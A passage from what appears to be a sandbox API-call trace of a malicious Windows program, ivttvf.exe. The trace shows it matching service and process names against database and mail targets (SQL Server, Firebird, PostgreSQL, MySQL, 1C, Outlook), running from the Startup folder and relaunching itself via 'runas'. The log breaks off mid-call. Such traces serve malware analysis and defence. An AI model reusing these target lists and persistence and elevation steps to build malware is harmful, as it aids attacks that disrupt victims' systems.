(lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0274.198] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0274.198] lstrlenW (lpString="nsi") returned 3 [0274.198] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0274.198] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0274.198] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0274.198] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0274.198] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0274.198] lstrlenW (lpString="PcaSvc") returned 6 [0274.198] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0274.198] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0274.198] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0274.198] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0274.198] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0274.198] lstrlenW (lpString="PlugPlay") returned 8 [0274.198] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0274.198] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0274.198] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0274.198] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0274.198] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0274.198] lstrlenW (lpString="Power") returned 5 [0274.198] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0274.198] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0274.199] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0274.199] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0274.199] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0274.199] lstrlenW (lpString="ProfSvc") returned 7 [0274.199] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0274.199] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0274.199] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0274.199] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0274.199] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0274.199] lstrlenW (lpString="RpcEptMapper") returned 12 [0274.199] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0274.199] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0274.199] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0274.199] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0274.199] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0274.199] lstrlenW (lpString="RpcSs") returned 5 [0274.199] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0274.199] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0274.199] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0274.199] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0274.199] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0274.199] lstrlenW (lpString="SamSs") returned 5 [0274.199] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0274.199] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0274.199] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0274.199] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0274.199] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0274.199] lstrlenW (lpString="Schedule") returned 8 [0274.199] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0274.200] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0274.200] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0274.200] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0274.200] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0274.200] lstrlenW (lpString="SENS") returned 4 [0274.200] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0274.200] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0274.200] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0274.200] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0274.200] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0274.200] lstrlenW (lpString="ShellHWDetection") returned 16 [0274.200] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0274.200] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0274.200] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0274.200] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0274.200] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0274.200] lstrlenW (lpString="Spooler") returned 7 [0274.200] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0274.200] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0274.200] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0274.200] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0274.200] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0274.200] lstrlenW (lpString="Themes") returned 6 [0274.200] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0274.200] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0274.200] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0274.201] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0274.201] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0274.201] lstrlenW (lpString="UxSms") returned 5 [0274.201] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0274.201] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0274.201] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0274.201] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0274.201] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0274.201] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3afc178 | out: hHeap=0x5e0000) returned 1 [0274.201] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d4 [0274.202] Process32FirstW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.203] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0274.203] lstrlenW (lpString="System") returned 6 [0274.203] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0274.203] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0274.203] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0274.203] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0274.203] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0274.203] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0274.203] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0274.203] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0274.203] lstrlenW (lpString="smss.exe") returned 8 [0274.203] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0274.203] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0274.203] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0274.203] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0274.203] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0274.204] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0274.204] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0274.204] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0274.204] lstrlenW (lpString="csrss.exe") returned 9 [0274.204] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0274.204] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0274.204] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0274.204] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0274.204] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0274.204] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0274.204] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0274.204] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0274.204] lstrlenW (lpString="wininit.exe") returned 11 [0274.204] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0274.204] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0274.204] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0274.205] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0274.205] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0274.205] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0274.205] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0274.205] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0274.205] lstrlenW (lpString="csrss.exe") returned 9 [0274.205] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0274.205] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0274.205] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0274.205] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0274.205] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0274.205] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0274.205] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0274.205] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0274.205] lstrlenW (lpString="winlogon.exe") returned 12 [0274.206] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0274.206] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0274.206] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0274.206] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0274.206] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0274.206] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0274.206] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0274.206] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0274.206] lstrlenW (lpString="services.exe") returned 12 [0274.206] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0274.206] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0274.206] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0274.206] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0274.206] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0274.206] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0274.206] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0274.206] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0274.207] lstrlenW (lpString="lsass.exe") returned 9 [0274.207] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0274.207] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0274.207] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0274.207] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0274.207] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0274.207] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0274.207] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0274.207] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0274.207] lstrlenW (lpString="lsm.exe") returned 7 [0274.208] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0274.208] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0274.208] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0274.208] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0274.208] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0274.208] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0274.208] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0274.208] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.208] lstrlenW (lpString="svchost.exe") returned 11 [0274.208] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0274.208] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0274.208] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0274.208] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0274.208] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0274.208] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0274.208] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0274.208] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.209] lstrlenW (lpString="svchost.exe") returned 11 [0274.209] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0274.209] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0274.209] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0274.209] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0274.209] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0274.209] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0274.209] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0274.209] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.209] lstrlenW (lpString="svchost.exe") returned 11 [0274.209] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0274.209] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0274.209] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0274.209] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0274.209] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0274.209] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0274.209] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0274.210] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.210] lstrlenW (lpString="svchost.exe") returned 11 [0274.210] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0274.210] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0274.210] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0274.210] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0274.210] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0274.210] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0274.210] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0274.210] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.210] lstrlenW (lpString="svchost.exe") returned 11 [0274.210] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0274.210] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0274.210] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0274.211] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0274.211] lstrlenW (lpString="audiodg.exe") returned 11 [0274.211] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.211] lstrlenW (lpString="svchost.exe") returned 11 [0274.211] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0274.211] lstrlenW (lpString="userinit.exe") returned 12 [0274.211] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0274.212] lstrlenW (lpString="explorer.exe") returned 12 [0274.212] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0274.212] lstrlenW (lpString="dwm.exe") returned 7 [0274.212] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.212] lstrlenW (lpString="svchost.exe") returned 11 [0274.212] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x3a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0274.213] lstrlenW (lpString="ivttvf.exe") returned 10 [0274.213] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x510, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0274.213] lstrlenW (lpString="spoolsv.exe") returned 11 [0274.213] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.213] lstrlenW (lpString="svchost.exe") returned 11 [0274.213] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0274.213] lstrlenW (lpString="taskhost.exe") returned 12 [0274.213] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0274.214] lstrlenW (lpString="reader_sl.exe") returned 13 [0274.214] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0274.214] lstrlenW (lpString="dllhost.exe") returned 11 [0274.214] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0274.214] CloseHandle (hObject=0x1d4) returned 1 [0274.214] Sleep (dwMilliseconds=0x1f4) [0274.951] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) Thread: id = 86 os_tid = 0x564 [0265.252] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634a60 [0265.252] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x640528 [0265.252] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634a90 [0265.252] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634a90, Size=0x20) returned 0x619d30 [0265.252] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634a90 [0265.252] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634a90, Size=0x20) returned 0x619d58 [0265.252] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76e20000 [0265.253] GetProcAddress (hModule=0x76e20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76e4d650 [0265.253] Wow64DisableWow64FsRedirection (in: OldValue=0x21cff28 | out: OldValue=0x21cff28*=0x0) returned 1 [0265.253] lstrlenW (lpString="kernel32.dll") returned 12 [0265.253] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619d30 | out: hHeap=0x5e0000) returned 1 [0265.253] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0265.253] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619d58 | out: hHeap=0x5e0000) returned 1 [0265.253] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x640528, nSize=0x7fff | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ivttvf.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\ivttvf.exe")) returned 0x47 [0265.253] ShellExecuteExW (pExecInfo=0x21cff34*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ivttvf.exe", lpParameters="-a", lpDirectory=0x0, nShow=1, hInstApp=0x0, 